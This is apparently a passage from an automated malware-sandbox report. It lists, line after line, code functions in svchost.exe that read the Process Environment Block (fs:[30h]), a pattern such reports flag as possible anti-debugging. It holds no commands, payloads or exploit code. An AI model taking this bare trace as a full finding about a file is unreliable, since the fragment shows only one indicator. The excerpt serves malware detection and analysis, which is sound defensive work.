                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D4180 mov eax, dword ptr fs:[00000030h]2_2_031D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032061E5 mov eax, dword ptr fs:[00000030h]2_2_032061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE1D0 mov eax, dword ptr fs:[00000030h]2_2_031AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F61C3 mov eax, dword ptr fs:[00000030h]2_2_031F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031601F8 mov eax, dword ptr fs:[00000030h]2_2_031601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E016 mov eax, dword ptr fs:[00000030h]2_2_0314E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4000 mov ecx, dword ptr fs:[00000030h]2_2_031B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D2000 mov eax, dword ptr fs:[00000030h]2_2_031D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6030 mov eax, dword ptr fs:[00000030h]2_2_031C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A020 mov eax, dword ptr fs:[00000030h]2_2_0312A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C020 mov eax, dword ptr fs:[00000030h]2_2_0312C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132050 mov eax, dword ptr fs:[00000030h]2_2_03132050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6050 mov eax, dword ptr fs:[00000030h]2_2_031B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315C073 mov eax, dword ptr fs:[00000030h]2_2_0315C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313208A mov eax, dword ptr fs:[00000030h]2_2_0313208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov eax, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F60B8 mov ecx, dword ptr fs:[00000030h]2_2_031F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C80A8 mov eax, dword ptr fs:[00000030h]2_2_031C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B20DE mov eax, dword ptr fs:[00000030h]2_2_031B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C0F0 mov eax, dword ptr fs:[00000030h]2_2_0312C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031720F0 mov ecx, dword ptr fs:[00000030h]2_2_031720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0312A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031380E9 mov eax, dword ptr fs:[00000030h]2_2_031380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B60E0 mov eax, dword ptr fs:[00000030h]2_2_031B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130710 mov eax, dword ptr fs:[00000030h]2_2_03130710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03160710 mov eax, dword ptr fs:[00000030h]2_2_03160710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C700 mov eax, dword ptr fs:[00000030h]2_2_0316C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov ecx, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316273C mov eax, dword ptr fs:[00000030h]2_2_0316273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AC730 mov eax, dword ptr fs:[00000030h]2_2_031AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C720 mov eax, dword ptr fs:[00000030h]2_2_0316C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130750 mov eax, dword ptr fs:[00000030h]2_2_03130750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE75D mov eax, dword ptr fs:[00000030h]2_2_031BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172750 mov eax, dword ptr fs:[00000030h]2_2_03172750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B4755 mov eax, dword ptr fs:[00000030h]2_2_031B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov esi, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316674D mov eax, dword ptr fs:[00000030h]2_2_0316674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138770 mov eax, dword ptr fs:[00000030h]2_2_03138770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140770 mov eax, dword ptr fs:[00000030h]2_2_03140770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D678E mov eax, dword ptr fs:[00000030h]2_2_031D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031307AF mov eax, dword ptr fs:[00000030h]2_2_031307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E47A0 mov eax, dword ptr fs:[00000030h]2_2_031E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313C7C0 mov eax, dword ptr fs:[00000030h]2_2_0313C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B07C3 mov eax, dword ptr fs:[00000030h]2_2_031B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031347FB mov eax, dword ptr fs:[00000030h]2_2_031347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031527ED mov eax, dword ptr fs:[00000030h]2_2_031527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BE7E1 mov eax, dword ptr fs:[00000030h]2_2_031BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03172619 mov eax, dword ptr fs:[00000030h]2_2_03172619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE609 mov eax, dword ptr fs:[00000030h]2_2_031AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314260B mov eax, dword ptr fs:[00000030h]2_2_0314260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314E627 mov eax, dword ptr fs:[00000030h]2_2_0314E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03166620 mov eax, dword ptr fs:[00000030h]2_2_03166620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168620 mov eax, dword ptr fs:[00000030h]2_2_03168620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0313262C mov eax, dword ptr fs:[00000030h]2_2_0313262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0314C640 mov eax, dword ptr fs:[00000030h]2_2_0314C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03162674 mov eax, dword ptr fs:[00000030h]2_2_03162674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F866E mov eax, dword ptr fs:[00000030h]2_2_031F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A660 mov eax, dword ptr fs:[00000030h]2_2_0316A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03134690 mov eax, dword ptr fs:[00000030h]2_2_03134690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031666B0 mov eax, dword ptr fs:[00000030h]2_2_031666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C6A6 mov eax, dword ptr fs:[00000030h]2_2_0316C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A6C7 mov eax, dword ptr fs:[00000030h]2_2_0316A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AE6F2 mov eax, dword ptr fs:[00000030h]2_2_031AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B06F1 mov eax, dword ptr fs:[00000030h]2_2_031B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6500 mov eax, dword ptr fs:[00000030h]2_2_031C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03204500 mov eax, dword ptr fs:[00000030h]2_2_03204500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140535 mov eax, dword ptr fs:[00000030h]2_2_03140535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E53E mov eax, dword ptr fs:[00000030h]2_2_0315E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03138550 mov eax, dword ptr fs:[00000030h]2_2_03138550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316656A mov eax, dword ptr fs:[00000030h]2_2_0316656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E59C mov eax, dword ptr fs:[00000030h]2_2_0316E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov eax, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03132582 mov ecx, dword ptr fs:[00000030h]2_2_03132582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03164588 mov eax, dword ptr fs:[00000030h]2_2_03164588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031545B1 mov eax, dword ptr fs:[00000030h]2_2_031545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B05A7 mov eax, dword ptr fs:[00000030h]2_2_031B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031365D0 mov eax, dword ptr fs:[00000030h]2_2_031365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A5D0 mov eax, dword ptr fs:[00000030h]2_2_0316A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E5CF mov eax, dword ptr fs:[00000030h]2_2_0316E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315E5E7 mov eax, dword ptr fs:[00000030h]2_2_0315E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031325E0 mov eax, dword ptr fs:[00000030h]2_2_031325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]2_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316C5ED mov eax, dword ptr fs:[00000030h]2_2_0316C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03168402 mov eax, dword ptr fs:[00000030h]2_2_03168402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316A430 mov eax, dword ptr fs:[00000030h]2_2_0316A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312E420 mov eax, dword ptr fs:[00000030h]2_2_0312E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312C427 mov eax, dword ptr fs:[00000030h]2_2_0312C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031B6420 mov eax, dword ptr fs:[00000030h]2_2_031B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312645D mov eax, dword ptr fs:[00000030h]2_2_0312645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315245A mov eax, dword ptr fs:[00000030h]2_2_0315245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0316E443 mov eax, dword ptr fs:[00000030h]2_2_0316E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315A470 mov eax, dword ptr fs:[00000030h]2_2_0315A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BC460 mov ecx, dword ptr fs:[00000030h]2_2_031BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031644B0 mov ecx, dword ptr fs:[00000030h]2_2_031644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031BA4B0 mov eax, dword ptr fs:[00000030h]2_2_031BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031364AB mov eax, dword ptr fs:[00000030h]2_2_031364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031304E5 mov ecx, dword ptr fs:[00000030h]2_2_031304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031AEB1D mov eax, dword ptr fs:[00000030h]2_2_031AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]2_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0315EB20 mov eax, dword ptr fs:[00000030h]2_2_0315EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]2_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031F8B28 mov eax, dword ptr fs:[00000030h]2_2_031F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEB50 mov eax, dword ptr fs:[00000030h]2_2_031DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]2_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4B4B mov eax, dword ptr fs:[00000030h]2_2_031E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]2_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031C6B40 mov eax, dword ptr fs:[00000030h]2_2_031C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031FAB40 mov eax, dword ptr fs:[00000030h]2_2_031FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031D8B42 mov eax, dword ptr fs:[00000030h]2_2_031D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0312CB7E mov eax, dword ptr fs:[00000030h]2_2_0312CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]2_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03140BBE mov eax, dword ptr fs:[00000030h]2_2_03140BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]2_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031E4BB0 mov eax, dword ptr fs:[00000030h]2_2_031E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031DEBD0 mov eax, dword ptr fs:[00000030h]2_2_031DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03150BCB mov eax, dword ptr fs:[00000030h]2_2_03150BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03130BCD mov eax, dword ptr fs:[00000030h]2_2_03130BCD
